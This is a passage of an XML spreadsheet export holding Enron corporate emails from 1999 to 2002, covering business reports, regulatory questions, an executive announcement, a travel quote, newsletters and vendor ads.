  </si>
  <si>
    <t>frozenset({'rodneyg@interaccess.com'})</t>
  </si>
  <si>
    <t>Interview thanks</t>
  </si>
  <si>
    <t>Dear Dr. Kaminski:_x000D_
Thank-you once again for inviting me to  interview for a position in your _x000D_
Corporate Research group. I very much enjoyed  meeting you and your _x000D_
colleagues. I was quite? impressed by the excellent  quality of the people _x000D_
and the entrepreneurial spirit at Enron. The ongoing  projects in support of _x000D_
energy and broadband? marketing as well as  insurance? are very interesting _x000D_
to me. I definitely would like to be a part  of these efforts. Thank-you _x000D_
again for the opportunity to interview with your  group._x000D_
?_x000D_
Sincerely,_x000D_
Rodney Greene</t>
  </si>
  <si>
    <t>Mon, 24 Sep 2001 12:59:28 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ken.powers@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jan.moore@enron.com', 'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'debbie.moseley@enron.com', 'dan.fancler@enron.com', 'tracy.geaccone@enron.com', 'steven.harris@enron.com', 'michelle.lokay@enron.com', 'kimberly.watson@enron.com', 'lindy.donoho@enron.com', 'darrell.schoolcraft@enron.com', 'mark.mcconnell@enron.com', 'jeanette.doll@enron.com', "paul.y'barbo@enron.com"})</t>
  </si>
  <si>
    <t>TW Daily Balance 09/24/2001</t>
  </si>
  <si>
    <t>Please see attached._x000D_
_x000D_
   _x000D_
_x000D_
Call me if you have any questions._x000D_
_x000D_
Ken Powers_x000D_
(402) 398-7065</t>
  </si>
  <si>
    <t>Tue, 30 Jan 2001 09:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>#509089</t>
  </si>
  <si>
    <t>This deal has an NP15 delivery point with firm energy.  Let me know._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Fri, 17 Aug 2001 06:51:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>Dave Delainey, Greg Piper, Janet Dietrich - Re:  Outsourcing (SB_x000D_
 n/a)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
_x000D_
Greg has asked Sally to join them.</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 01:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: California Call Agenda for Call 2-15-01</t>
  </si>
  <si>
    <t>Agenda:_x000D_
_x000D_
Legislative Update, incl AB31x_x000D_
Ruelte call w/ Ken Lay - Jeff Dasovich_x000D_
FERC order on creditworthiness_x000D_
Other</t>
  </si>
  <si>
    <t>Wed, 28 Nov 2001 15:55:02 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'survey@carnegiecomm.com'})</t>
  </si>
  <si>
    <t>Survey of Alums for Texas Lutheran University</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Texas Lutheran University has hired an independent market research firm, _x000D_
Carnegie Communications, to conduct a study of alumni perceptions and needs. _x000D_
Your feedback on the short survey will be invaluable as the College continues _x000D_
its strategic planning process. The link below will take you directly to _x000D_
the online survey. Once there, point and click your way through the questions, _x000D_
and click on "submit" when done. All who respond will be entered in a drawing _x000D_
to win a gift pack valued at $250 from the TLU bookstore. _x000D_
_x000D_
Thank you!_x000D_
_x000D_
&lt;html&gt;_x000D_
&lt;p&gt;&lt;a href="http://www.carnegiecomm.com/sms/tlualum.htm?2166"&gt;http:// www.carnegiecomm.com/sms/tlualum.htm?2166&lt;/a&gt;&lt;/p&gt;_x000D_
&lt;/html&gt;_x000D_
_x000D_
If this link is not active, please copy and paste the URL into your Internet _x000D_
browser. If you would prefer to receive a text version of this survey via _x000D_
e-mail that you can complete and return in the mail, reply to this message _x000D_
and we'll e-mail one to you._x000D_
_x000D_
Sincerely,_x000D_
Elizabeth K. Scarborough_x000D_
Vice President_x000D_
Carnegie Communications_x000D_
</t>
  </si>
  <si>
    <t>Thu, 27 Sep 2001 19:18:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron Board Elects New Corporate Secretary</t>
  </si>
  <si>
    <t>I am pleased to announce that the Enron Board has elected Paula Rieker as corporate secretary, effective immediately.  She will replace Rebecca Carter, who has served in that role since 1999.  Paula will have dual reporting responsibility to me and to Jim Derrick, executive vice president and general counsel._x000D_
_x000D_
Paula joined Enron in 1990 and has experience in a variety of functions, including assistant treasurer for Enron Corp., vice president and chief financial officer of Enron Global Power &amp; Pipelines, and vice president of Financial Initiatives in Accounting.  Most recently, she has been managing director of Investor Relations, where she has worked for the past four years.  Paula will continue in a dual role with IR through mid-October.  Paula has a bachelor's degree in finance from Texas A&amp;M University, and she is a Certified Public Accountant._x000D_
_x000D_
Rebecca has been with the company for 11 years and served in a variety of capacities.  I want to thank Rebecca for her many years of service to Enron.  I am sorry she has decided to leave, but am grateful she will stay on through the end of January to ensure a smooth transition of her duties.  _x000D_
_x000D_
Please join me in congratulating Paula on her new responsibilities and in wishing Rebecca well in her future endeavors.</t>
  </si>
  <si>
    <t>Fri, 9 Mar 2001 09:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 03/09/2001 _x000D_
05:07 PM ---------------------------_x000D_
_x000D_
_x000D_
"MacMillan, Ian" &lt;macmilli@wharton.upenn.edu&gt; on 03/08/2001 01:47:27 PM_x000D_
To: "'Vince.J.Kaminski@enron.com'" &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE: Lawyer_x000D_
_x000D_
_x000D_
I will sign an agreement not to use the materials_x000D_
_x000D_
-----Original Message-----_x000D_
From: Vince.J.Kaminski@enron.com [mailto:Vince.J.Kaminski@enron.com]_x000D_
Sent: Thursday, March 08, 2001 11:13 AM_x000D_
To: macmilli@wharton.upenn.edu_x000D_
Cc: Vince.J.Kaminski@enron.com_x000D_
Subject: Re: Lawyer_x000D_
_x000D_
_x000D_
_x000D_
Ian,_x000D_
_x000D_
Sorry for a delay in getting back to you._x000D_
I have one challenge I did not anticipate_x000D_
when I talked to you  the first time about our Real Options_x000D_
internal seminar._x000D_
_x000D_
The materials were prepared in collaboration with a professor_x000D_
from another school, and there is some  sensitivity regarding_x000D_
the intellectual property rights and the ability to distribute the_x000D_
materials_x000D_
outside Enron._x000D_
_x000D_
Please, give me some time to find out if I can work_x000D_
around this issue._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"MacMillan, Ian" &lt;macmilli@wharton.upenn.edu&gt; on 03/07/2001 06:46:28 AM_x000D_
_x000D_
To:   "'Vince.J.Kaminski@enron.com'" &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:_x000D_
Subject:  Lawyer_x000D_
_x000D_
_x000D_
I still have not heard from your lawyer.  I would like to see whar_x000D_
materials you are using and assess how we could work on the topic of real_x000D_
options with Enron_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Feb 2001 20:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'kevin.hyatt@enron.com', 'jeffery.fawcett@enron.com', 'michelle.lokay@enron.com', 'steven.harris@enron.com'})</t>
  </si>
  <si>
    <t>ROFR Q&amp;A</t>
  </si>
  <si>
    <t>The question came up yesterday whether a shipper who contracts for firm capacity for a year or more at a negotiated rate is entitled to a ROFR._x000D_
_x000D_
I've done some checking, and the answer is no, a negotiated rate shipper that entered into a contract after March 27, 2000 does not automatically get ROFR rights.   This was clearly stated by FERC in Order No. 637-A.   It does not matter whether the negotiated rate is above the maximum tariff rate; the contract is still not considered to be "at maximum rates" for ROFR purposes._x000D_
_x000D_
As you know, our tariff does allow us to mutually agree to include ROFR rights in a contract with a shipper who does not automatically get ROFR rights.  _x000D_
_x000D_
Any questions -- let me know.</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 08:55:16 -0700 (PDT)</t>
  </si>
  <si>
    <t>ERV Notification:  (West VaR and Off-Peak Position Report By Trader_x000D_
 - 10/23/2001)</t>
  </si>
  <si>
    <t>The report named: West VaR and Off-Peak Position Report By Trader &lt;http://erv.corp.enron.com/linkFromExcel.asp?report_cd=27&amp;report_name=West+VaR+and+Off-Peak+Position+Report+By+Trader&amp;category_cd=6&amp;category_name=WEST&amp;toc_hide=1&amp;sTV1=6&amp;TV1Exp=Y&amp;current_efct_date=10/23/2001&gt;, published as of 10/23/2001 is now available for viewing on the website._x000D_
_x000D_
(Revision: 2)</t>
  </si>
  <si>
    <t>Wed, 24 May 2000 04:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'william.nealy@enron.com'})</t>
  </si>
  <si>
    <t>final draft - sale of assets</t>
  </si>
  <si>
    <t>Forget the 2nd draft that I sent.  This is the draft that I meant to sent.</t>
  </si>
  <si>
    <t>Thu, 28 Dec 2000 02:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Have you decided on plans for New Years?  I was thinking about doing a nice _x000D_
dinner somewhere (i.e. Ruth Chris).  Let me know._x000D_
_x000D_
-Eric</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 10:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bfpjv@c-zone.net', 'roger.pelote@williams.com', 'rescalante@riobravo-gm.com', 'jackp@calpine.com', 'siliff@riobravo-gm.com', 'tcortopassi@ogden-energy.com', 'fmisseldine@caithnessenergy.com', 'billw@calpine.com', 'steve_ponder@fpl.com', 'nam.nguyen@powersrc.com', 'dnelsen@gwfpower.com', 'cody.carter@williams.com', 'wfhall2@duke-energy.com', 'emaddox@seawestwindpower.com', 'freesrj@apci.com', 'eric.eisenman@neg.pge.com', 'dean_gosselin@fpl.com', 'khoffman@caithnessenergy.com', 'hellertj@apci.com', 'pete@calwind.com', 'twetzel@thermoecotek.com', 'wscobee@caithnessenergy.com', 'marty_mcfadden@ogden-energy.com', 'sdl@calwind.com', 'jdasovic@enron.com', 'ed.tomeo@uaecorp.com', 'wcarlson@wm.com', 'joe.greco@uaecorp.com', 'rboyd@enron.com', 'cabaker@duke-energy.com', 'paula_soos@ogden-energy.com', 'curt.hatton@gen.pge.com', 'joer@calpine.com', 'jweisgall@aol.com'})</t>
  </si>
  <si>
    <t>Conference Call Scheduled for 10:00 a.m. on Friday, November 17</t>
  </si>
  <si>
    <t>A conference call has been scheduled for 10:00 a.m.  (PST) on Friday, _x000D_
November 17.? The purpose of the call will be to discuss  IEP's proposed _x000D_
comments to the latest draft of the CAISO's Long-Term Grid  Planning tariff _x000D_
language.? _x000D_
?_x000D_
Attached are IEP's proposed comments on the CAISO  LTGP tariff language._x000D_
?_x000D_
The Call-In Number is???  ??? ??? 888/296-1938_x000D_
The Participant Code is???  ???? 111756_x000D_
 - LTGP Comments - Template    Nov 17   2000.doc</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 21:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>ISDA European Energy Conference Agenda</t>
  </si>
  <si>
    <t>Stacey,_x000D_
_x000D_
Mark H. and I met this afternoon to discuss the December conference agenda and have the following suggestions:_x000D_
_x000D_
1.  Review of California Energy Litigation -- (Mark H. would be good for this one.  If he can't make it, we can probably find a substitute.)_x000D_
2.  German Energy Markets_x000D_
3.  Convergence of Commodity Trading Forms_x000D_
_x000D_
There were also a couple of topics included on the Houston agenda this year that might also be appropriate:_x000D_
_x000D_
Christophe's panel discussion on new markets_x000D_
E-commerce panel_x000D_
_x000D_
I have also copied several of the lawyers in our London office who are active in the derivatives and commodity trading world to solicit their suggestions for appropriate topics to be added to the agenda.</t>
  </si>
  <si>
    <t>Thu, 21 Mar 2002 03:04:51 -0800 (PST)</t>
  </si>
  <si>
    <t>logorrhea: Dictionary.com Word of the Day</t>
  </si>
  <si>
    <t>/-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\_x000D_
How does your credit report present you to prospective employers, _x000D_
loan officers, and landlords? Find out  with your FREE CREDIT _x000D_
REPORT &amp; free CreditCheck(R) Monitoring Service trial membership _x000D_
from ConsumerInfo.Com!  Get yours now! _x000D_
http://by.advertising.com/1/c/62072/34419/163176/163176_x000D_
_x000D_
&lt;a href="http://by.advertising.com/1/c/62072/34419/163176/163176"&gt; _x000D_
AOL users click here &lt;/a&gt;_x000D_
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/_x000D_
_x000D_
   Word of the Day for Thursday March 21, 2002:_x000D_
_x000D_
   logorrhea \law-guh-REE-uh\, noun:_x000D_
   Excessive talkativeness or wordiness._x000D_
_x000D_
     By  his  own  measure,  he is a man of many contradictions,_x000D_
     beginning with the fact that he is famous as a listener but_x000D_
     suffers  from  "a  touch of logorrhea." He is so [1]voluble_x000D_
     that one wonders how his subjects get a word in edgewise._x000D_
     --Mel  Gussow,  "Listener,  Talker, Now Literary Lion: It's_x000D_
     Official." [2]New York Times, June 17, 1997_x000D_
_x000D_
     It's also not good if your date has logorrhea._x000D_
     --Monte  Williams,  "8  Minutes  in  the  Life  of a Jewish_x000D_
     Single:  Not  Attracted? Next!" [3]New York Times, March 5,_x000D_
     2000_x000D_
_x000D_
     Mr.  King,  who  possesses  an  enviable  superabundance of_x000D_
     imagination, suffers from a less enviable logorrhea._x000D_
     --Michele  Slung,  "Scare  Tactics." [4]New York Times, May_x000D_
     10, 1981_x000D_
     __________________________________________________________x000D_
_x000D_
   Logorrhea  is  derived  from  Greek logos, "word" + rhein, "to_x000D_
   flow."_x000D_
_x000D_
References_x000D_
_x000D_
   1. http://dictionary.com/wordoftheday/archive/2002/02/17.html_x000D_
   2. http://www.nytimes.com/_x000D_
   3. http://www.nytimes.com/_x000D_
   4. http://www.nytimes.com/_x000D_
_x000D_
_x000D_
_._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._.__x000D_
_x000D_
You are currently subscribed to Dictionary.com Word of the Day as: _x000D_
matt.motley@enron.com_x000D_
_x000D_
To subscribe to the list by email, send a blank message to:_x000D_
join-WordoftheDay@lists.lexico.com_x000D_
_x000D_
To unsubscribe via email, send a blank message to:_x000D_
leave-wordoftheday-357530C@lists.lexico.com_x000D_
_x000D_
Subscriptions can be turned on and off from the Web at_x000D_
http://www.dictionary.com/wordoftheday/list/_x000D_
_x000D_
Dictionary.com Word of the Day_x000D_
http://www.dictionary.com/wordoftheday/_x000D_
(C) 2002 by Lexico Publishing Group, LLC.</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 07:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Vacation Request</t>
  </si>
  <si>
    <t>Mr. Lavorato,_x000D_
_x000D_
Hello.  Below are estimates on the vacation we discussed last week.  I_x000D_
know that Jamaica was not a set destination but I really feel something_x000D_
like the FDR Resort might be a good options for a family vacation.  One_x000D_
of the biggest pluses is the nanny you are assigned upon arrival I think_x000D_
most people find it really makes the vacation stress fee.  I will be_x000D_
honest with you there are other resorts in the Caribbean that are nicer_x000D_
but they are not family resorts.  Programs and things are offered for_x000D_
children usually starting at 4 years (sometimes 3) of age nanny services_x000D_
are not really provide and just babysitting that must be prearranged.  If_x000D_
features like the nanny service are not as important to you then I will_x000D_
make other suggestions.   I am not including rates on the Boscobel Beach_x000D_
Resort because they just closed to do renovation that will last until_x000D_
December 2001.  If you have any questions, need additional information,_x000D_
or would like to set up reservations please do not hesitate to call or_x000D_
E-mail._x000D_
_x000D_
_x000D_
Regards,_x000D_
Crystal Schwartz_x000D_
_x000D_
_x000D_
***ESTIMATES BELOW ARE SUBJECT TO AVAILABILITY AND PRICE CHANGE UNTIL_x000D_
CONFIRMED WITH PAYMENTS NEEDED.***_x000D_
_x000D_
ROUND-TRIP AIRFARE ON AMERICAN AIRLINES -_x000D_
**CONNECTIONS IN MIAMI**_x000D_
$625.00 PER ADULT_x000D_
$437.00 CHILD FARE_x000D_
**RATE IS SUBJECT TO AVAILABILITY AND PRICE CHANGE UNTIL CONFIRMED WITH_x000D_
PAYMENTS NEEDED.  I HAVE BASED THE RATES ABOVE ON DEPARTURE FEBRUARY 21,_x000D_
2001 - FEBRUARY 28, 2001 PLEASE WHAT YOU WOULD PREFER AND I WILL CHECK_x000D_
FOR SEATING._x000D_
_x000D_
ROUND-TRIP AIRFARE ON CONTINENTAL AIRLINES -_x000D_
***CONNECTIONS IN TAMPA**_x000D_
$625.00 PER ADULT_x000D_
$365.00 CHILD FARE_x000D_
**SAME NOTES AND DATES AS ABOVE**_x000D_
_x000D_
_x000D_
FDR RESORT -_x000D_
PLEASE TAKE A LOOK AT THIS WEB SITE IF YOU HAVE TIME WWW.WHERE2STAY.COM_x000D_
THEY HAVE PICTURE AND COMMENTS FROM CLIENTS WHO HAVE STAYED THERE IN THE_x000D_
PAST YEAR._x000D_
_x000D_
ONE BEDROOM SUITE WITH NANNY - $4100.00 FOR 7 NIGHTS_x000D_
TWO BEDROOM SUITE WITH NANNY - $5150.00 FOR 7 NIGHTS_x000D_
_x000D_
_x000D_
_x000D_
=====_x000D_
Vitol Travel Services_x000D_
1100 Louisiana Suite 3230_x000D_
Houston, Texas 77002_x000D_
Phone - 713-759-1444_x000D_
Fax - 713-759-9006_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Yahoo! Shopping - Thousands of Stores. Millions of Products._x000D_
http://shopping.yahoo.com/</t>
  </si>
  <si>
    <t>Tue, 22 Jun 1999 02:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'carlew@flash.net'})</t>
  </si>
  <si>
    <t xml:space="preserve">That will work just fine!  Just let me know where to meet.  SS_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Carson Llewellyn &lt;carlew@flash.net&gt;                           06/22/99 _x000D_
09:17 AM_x000D_
	_x000D_
_x000D_
Please respond to carlew@flash.net_x000D_
To: Sara Shackleton/HOU/ECT_x000D_
cc:  _x000D_
Subject: Lunch_x000D_
_x000D_
_x000D_
_x000D_
Sara_x000D_
_x000D_
How about lunch this Friday, 6/25/99 about 11:45am? I will come_x000D_
downtown._x000D_
_x000D_
Carson_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 6 Apr 2001 13:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: asp project 2</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
_x000D_
try this.  thanks._x000D_
_x000D_
Mat</t>
  </si>
  <si>
    <t>Thu, 27 Jan 2000 04:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'awais.omar@enron.com', 'sally.beck@enron.com'})</t>
  </si>
  <si>
    <t>EOL Report 1-26</t>
  </si>
  <si>
    <t xml:space="preserve">Please add awais &amp; sally to distribution_x000D_
---------------------- Forwarded by Bob Shults/HOU/ECT on 01/27/2000 12:32 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Carrie Southard_x000D_
01/27/2000 09:54 AM_x000D_
To: Amita Gosalia/LON/ECT@ECT, Angela Connelly/LON/ECT@ECT_x000D_
cc: Torrey Moorer/HOU/ECT@ECT, Bob Shults/HOU/ECT@ECT, Jennifer deBoisblanc _x000D_
Denny/HOU/ECT@ECT, Tara Sweitzer/HOU/ECT@ECT _x000D_
Subject: EOL Report 1-26_x000D_
_x000D_
Hi Amita and Angela,_x000D_
_x000D_
Today went very smoothly. We had one glitch in that UK Power jumped the gun _x000D_
and changed their columns in today's report.  We were able to spot it and fix _x000D_
it.  Getting the heads up from Lara was greatly appreciated!  Please continue _x000D_
to communicate changes you know about to us because it is a tremendous help!_x000D_
_x000D_
Thank you for your help.  Hope you have a great afternoon!_x000D_
_x000D_
_x000D_
_x000D_
Carrie _x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 04:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'responses@newpower.com'})</t>
  </si>
  <si>
    <t>Welcome to NewPower!!!</t>
  </si>
  <si>
    <t xml:space="preserve">    Thank you for joining NewPowerTM - a new kind of power company!  We are _x000D_
committed to offering you competitive prices on electricity.  Your upgrade is _x000D_
almost complete.  You will soon be receiving a NewPower Welcome Kit regarding _x000D_
your enrollment.  That information will be sent to the mailing address that _x000D_
you supplied when you enrolled via our website._x000D_
_x000D_
    In the next few weeks we will be busy working with your local utility to _x000D_
complete your enrollment.  Remember, as part of the sign up process you have _x000D_
the right to cancel NewPower electric service without penalty within three _x000D_
business days of your receipt of the terms and conditions.  To contact us _x000D_
with questions or to cancel, please see the information listed below._x000D_
_x000D_
 NewPower delivers many other benefits as well.  You'll also receive special _x000D_
ongoing offers on Smart Home Solutions that can help bring technological _x000D_
innovation, security and additional savings to your household.  So New Power _x000D_
can help brighten your life in several ways - not just today, but in the _x000D_
months to come.  And that can be pretty powerful._x000D_
_x000D_
 In the meantime, you'll find the Terms &amp; Conditions of being a NewPower _x000D_
customer with your Welcome Kit.  If you would like to learn more, check out _x000D_
the Questions section at our web site www.newpower.com (America Online _x000D_
Keyword: NewPower) or call us at 1-800-NEWPOWER between 7 am and 9 pm Eastern _x000D_
Time._x000D_
_x000D_
 Once again, thank you for joining NewPower, we look forward to serving you _x000D_
in the future._x000D_
_x000D_
 For Service Inquiries:_x000D_
_x000D_
 E-mail us at support@newpower.com or visit our website at www.newpower.com._x000D_
_x000D_
 For information about NewPower service in your area, call:_x000D_
 1-877-819-9817   [HL&amp;P customers]_x000D_
 1-877-819-9816   [TXU customers]_x000D_
 Fax 1-877-527-5218_x000D_
_x000D_
 Postal Address:_x000D_
 The New Power Company_x000D_
 P.O. Box 563985_x000D_
 Charlotte, NC 28256_x000D_
_x000D_
    </t>
  </si>
  <si>
    <t>Sat, 22 Dec 2001 21:36:57 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 12/22/01; HourAhead hour: 20;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 12/22/01; HourAhead hour: 20;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2001122220.txt</t>
  </si>
  <si>
    <t>Sun, 27 Jan 2002 09:54:14 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'deleeuw@stat.ucla.edu'})</t>
  </si>
  <si>
    <t>frozenset({'r-announce@stat.math.ethz.ch'})</t>
  </si>
  <si>
    <t>Journal of Statistical Software</t>
  </si>
  <si>
    <t>_x000D_
JSS, which is at http://www.jstatsoft.org, publishes statistical software_x000D_
with manuals, as well as papers describing, comparing, and evaluating_x000D_
statistical_x000D_
software. Abstracts of all contributions accepted in JSS are published in_x000D_
printed form in JCGS._x000D_
_x000D_
Although we publish software written in any language, we especially_x000D_
welcome software written in R. The general idea is that packages written_x000D_
in R can be documented in both "R News" and in JSS, but that generally_x000D_
the_x000D_
description in JSS will be more extensive and more seriously_x000D_
peer-reviewed._x000D_
Everybody in the R community is encouraged to submit their R products_x000D_
to JSS, we even welcome "code snippet" type of contributions (which will_x000D_
go into a separate section of the journal)._x000D_
_x000D_
Volume 7, 2002, consists so far of the following three issues_x000D_
_x000D_
issue 1:_x000D_
S. Weisberg_x000D_
Dimension reduction regression in R._x000D_
_x000D_
issue 2:_x000D_
A. Zeileis, F. Leisch, and K. Hornik_x000D_
strucchange: an R package for testing for structural change_x000D_
in linear regression models_x000D_
_x000D_
issue 3:_x000D_
G. Marsaglia and W.W. Tsang_x000D_
Some difficult-to-pass tests of randomness._x000D_
_x000D_
===_x000D_
Jan de Leeuw; Professor and Chair, UCLA Department of Statistics;_x000D_
US mail: 9432 Boelter Hall, Box 951554, Los Angeles, CA 90095-1554_x000D_
phone (310)-825-9550;  fax (310)-206-5658;  email: deleeuw@stat.ucla.edu_x000D_
homepage: http://www.stat.ucla.edu/~deleeuw_x000D_
========================================================_x000D_
           No matter where you go, there you are. --- Buckaroo Banzai_x000D_
                    http://www.stat.ucla.edu/~deleeuw/sounds/nomatter.au_x000D_
========================================================_x000D_
_x000D_
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-_x000D_
r-announce mailing list -- Read http://www.ci.tuwien.ac.at/~hornik/R/R-FAQ.html_x000D_
Send "info", "help", or "[un]subscribe"_x000D_
(in the "body", not the subject !)  To: r-announce-request@stat.math.ethz.ch_x000D_
_._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._</t>
  </si>
  <si>
    <t>Thu, 7 Sep 2000 08:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gwendolyn.petteway@enron.com'})</t>
  </si>
  <si>
    <t>Analyst Program changes</t>
  </si>
  <si>
    <t>Gwen,_x000D_
_x000D_
Dolores Muzzy gave me your name as a contact for information regarding the _x000D_
redesigned Analyst/Associate programs.  I am currently half-way through my _x000D_
second rotation with the Analyst program and was hoping to get a better idea _x000D_
of the different opportunities available to me upon completion of my current _x000D_
rotation.  Although six months seems like a fair amount of time to plan my _x000D_
next move, I know how quickly it will pass and do not want to find myself _x000D_
uncertain as to what action to take to insure that I am heading in the right _x000D_
direction to meet my current goals.  I would appreciate the opportunity to _x000D_
meet with you and discuss the aforementioned topics at your earliest _x000D_
convenience.  If there is another individual you feel would be a better _x000D_
contact for me at this point I would be happy to meet with them as well. _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Susan Scott</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 09:14:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: NWPL flows for db</t>
  </si>
  <si>
    <t xml:space="preserve">all set :-)_x000D_
_x000D_
Chris_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Wolfe, Jason  _x000D_
Sent:	Wednesday, October 24, 2001 10:52 AM_x000D_
To:	Hyde, Chris_x000D_
Subject:	NWPL flows for db_x000D_
_x000D_
 &lt;&lt; File: NWPL_01_05_13a.xls &gt;&gt;  &lt;&lt; File: NWPL_01_07_18a.xls &gt;&gt;  &lt;&lt; File: NWPL_01_09_21a.xls &gt;&gt;  &lt;&lt; File: NWPL_98_12_25a.xls &gt;&gt;  &lt;&lt; File: NWPL_98_12_30a.xls &gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 16 Oct 2000 02:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Dow Jones Reports that PG&amp;E Buys Forward for 5.6 cents for two_x000D_
 years</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Steven J Kean/NA/Enron on 10/16/2000 09:58 AM -----_x000D_
_x000D_
	Jeff Dasovich_x000D_
	Sent by: Jeff Dasovich_x000D_
	10/13/2000 05:10 PM_x000D_
		 _x000D_
		 To: skean@enron.com, James D Steffes/NA/Enron@Enron, Tim Belden/HOU/ECT@ECT, _x000D_
Christopher F Calger/PDX/ECT@ECT, David Parquet/SF/ECT@ECT, Laird _x000D_
Dyer/SF/ECT@ECT, Sandra McCubbin/SFO/EES@EES, Mona L Petrochko/SFO/EES@EES, _x000D_
Paul Kaufman/PDX/ECT@ECT, Susan J Mara/SFO/EES@EES, Robert _x000D_
Badeer/HOU/ECT@ECT, Mary Hain/HOU/ECT@ECT, Sarah Novosel/Corp/Enron@ENRON, _x000D_
Joe Hartsoe/Corp/Enron@ENRON, Margaret Carson/Corp/Enron@ENRON, Rob _x000D_
Bradley/Corp/Enron@ENRON_x000D_
		 cc: _x000D_
		 Subject: Dow Jones Reports that PG&amp;E Buys Forward for 5.6 cents for two years_x000D_
_x000D_
_x000D_
_x000D_
                                    _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Feb 2001 08:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'linda.ewing@enron.com'})</t>
  </si>
  <si>
    <t>Re: Sempra Energy trading</t>
  </si>
  <si>
    <t xml:space="preserve">Andy, Kathy - can you help with this?   _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Linda J Ewing_x000D_
02/23/2001 02:00 PM_x000D_
To: Scott Neal/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Sempra Energy trading_x000D_
_x000D_
I need the desk id for Sempra Energy trading Temp # 67083 for 01/2001 _x000D_
production  (Supply)_x000D_
_x000D_
_x000D_
Thanks_x000D_
Linda_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 1 Oct 2001 14:29:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>Pulp Presentation</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the pulp presentation on the pulp facts. I also sent it out to Andrew Conner for review. Please take a look and let me know._x000D_
_x000D_
thanks,_x000D_
Monika </t>
  </si>
  <si>
    <t>Tue, 15 Jan 2002 15:50:35 -0800 (PST)</t>
  </si>
  <si>
    <t>RIGZONE Special Offer - Save 50% on Mapper GIS Solution</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
=09=09=09[IMAGE]=09=09_x000D_
=09=09 =09=09=09_x000D_
=09=09=09[IMAGE]=09=09_x000D_
=09=09=09[IMAGE]=09=09_x000D_
[IMAGE]=09=09 RIGZONE [IMAGE] [IMAGE] [IMAGE] =09[IMAGE]=09=09_x000D_
[IMAGE]=09=09   home    | news    | search    | maps    | data    | jobs   =_x000D_
 | market    | store  =09[IMAGE]=09=09_x000D_
=09=09=09[IMAGE]=09=09_x000D_
[IMAGE]=09=09 [IMAGE] [IMAGE]     Mapper On Sale - only $350   Now through =_x000D_
January 31, you can save 50% on the already reduced price of Rigzone's Mapp=_x000D_
er software. This is an unbeatable deal on an unparalleled software applica=_x000D_
